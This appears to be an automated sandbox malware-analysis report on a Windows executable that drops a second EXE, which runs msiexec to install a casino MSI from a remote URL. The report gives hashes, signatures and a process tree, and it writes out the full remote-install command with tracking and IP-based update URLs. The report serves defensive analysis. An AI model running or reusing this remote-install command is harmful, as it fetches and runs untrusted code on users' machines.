e1e515c274246f3b57fd0ccb867d3e1ba6806c91783c48eb67bccd627919c909

Analysis

max time kernel
93s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
04/02/2024, 19:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8feb40e7af6910baea3e4e8f56c027aa.exe
Size

1.4MB
MD5

8feb40e7af6910baea3e4e8f56c027aa
SHA1

55ce4885d441f19af634a9397af3df1026fa2d8f
SHA256

e1e515c274246f3b57fd0ccb867d3e1ba6806c91783c48eb67bccd627919c909
SHA512

92aeb670ca8b27e107cd45b859379fd74af71d826232e289e28131f5e8dcf0ff00534ac7c82b4ac1dbb3c9b32d536ba524b590c925a9519ee9990a2c34620cd8
SSDEEP

24576:Dbq0qCD9wpLUWaD/vswDzsRbq/Cxy/0y6faI6slAH2LtghBdW9PY6kFnUqZQL:lqg9c4UPxy8ydI6slArxa1

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1564	8r2qu1.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
1008	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1008	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	1008	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1008	MSIEXEC.EXE
1008	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4988 wrote to memory of 1564	4988	8feb40e7af6910baea3e4e8f56c027aa.exe	84
PID 4988 wrote to memory of 1564	4988	8feb40e7af6910baea3e4e8f56c027aa.exe	84
PID 4988 wrote to memory of 1564	4988	8feb40e7af6910baea3e4e8f56c027aa.exe	84
PID 1564 wrote to memory of 1008	1564	8r2qu1.exe	89
PID 1564 wrote to memory of 1008	1564	8r2qu1.exe	89
PID 1564 wrote to memory of 1008	1564	8r2qu1.exe	89

C:\Users\Admin\AppData\Local\Temp\8feb40e7af6910baea3e4e8f56c027aa.exe
"C:\Users\Admin\AppData\Local\Temp\8feb40e7af6910baea3e4e8f56c027aa.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4988
- C:\Users\Admin\AppData\Local\Temp\8r2qu1.exe
  C:\Users\Admin\AppData\Local\Temp\8r2qu1.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://prior.filesdl.eu/36175/cdn/slotsjungle/Slots Jungle Casino20130320112631.msi" DDC_DID=1911354 DDC_RTGURL=http://www.dlsetup.eu/dl/TrackSetup/TrackSetup.aspx?DID=1911354%26filename=SlotsJungle%2Eexe%26CASINONAME= DDC_UPDATESTATUSURL=http://209.200.154.71:8080/slotjungle/Lobby.WebServices/Installer.asmx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="8r2qu1.exe"
    3⤵
    - Use of msiexec (install) with remote resource
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:1008

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8r2qu1.exe

Filesize
1.2MB

MD5
4b0b2890684f36dd7556247a195f7025

SHA1
b2f8dfc03ef526de60aa7611a5163837071d6603

SHA256
55d385bd300924ea1662f94e41bd1e14b23b9b7bae9f8858ef4692aa29276733

SHA512
245b3eda6d20e3af3adb9d57fa59f214ed2f896c85a4f0bb7745838800c769d30cab70c5cb58543bc7c31131c37e739bcda3daad23e19973e809f7075b4864da

Download Submit
C:\Users\Admin\AppData\Local\Temp\_is4E15.tmp

Filesize
1KB

MD5
0c9b9cbf8abb604d852b9877c51445a8

SHA1
000ff7f4159f83c5a504417e2ed3e2d86ece472e

SHA256
12d0e27daf4bbe1847e6bade71c4dbb61a4e3c62079aa0c6e76e2d2bd25d6e2a

SHA512
35a8337453a7867878e91877312d538b69c3bbe934392aa0a36c600639b3b0d0eee6c8b0abd8bfbf4609cf9cf39974a4d75b1351699a178cbdd52aaa9b5fae01

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E2BC33F8-8AE6-4308-88D5-DFFD193D0965}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E2BC33F8-8AE6-4308-88D5-DFFD193D0965}\_ISMSIDEL.INI

Filesize
400B

MD5
2a142de36a961d6e6ed034bb787041a9

SHA1
dbbfde019ddc07a7c25727a7b8c73646fe102d4c

SHA256
2d04a0a1932f79b468b6e1302e5ce35c4750b5ecf6370fe1e798c204b5fc99c0

SHA512
41a69fcb5b20401bce7180f2e43620b0a9715a0153ada5be8e65a55b46c9f2ad62184c2c1fc474e8f29c5131f34a6f8ca6ea0b4836a47c6100fe4f8f97c6fd1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E2BC33F8-8AE6-4308-88D5-DFFD193D0965}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~4E12.tmp

Filesize
5KB

MD5
e170c107d438c245698dee4a2a6dc5df

SHA1
1f28daa502ee785d96ae5385d65fe2a6aee7c172

SHA256
09efcf4e684175d0b061e30e69987044f830135404ce76b47cf170a3323e47eb

SHA512
6d01e9cf449b09d9f19d3af99e85f2f69b24ed1f3b4e7a562e66ff5dd31f8009dfb780ceb12f4e5cbc232dbe7c10b0a4f0be3df8469a6c6714452d996f3c04f2

Download Submit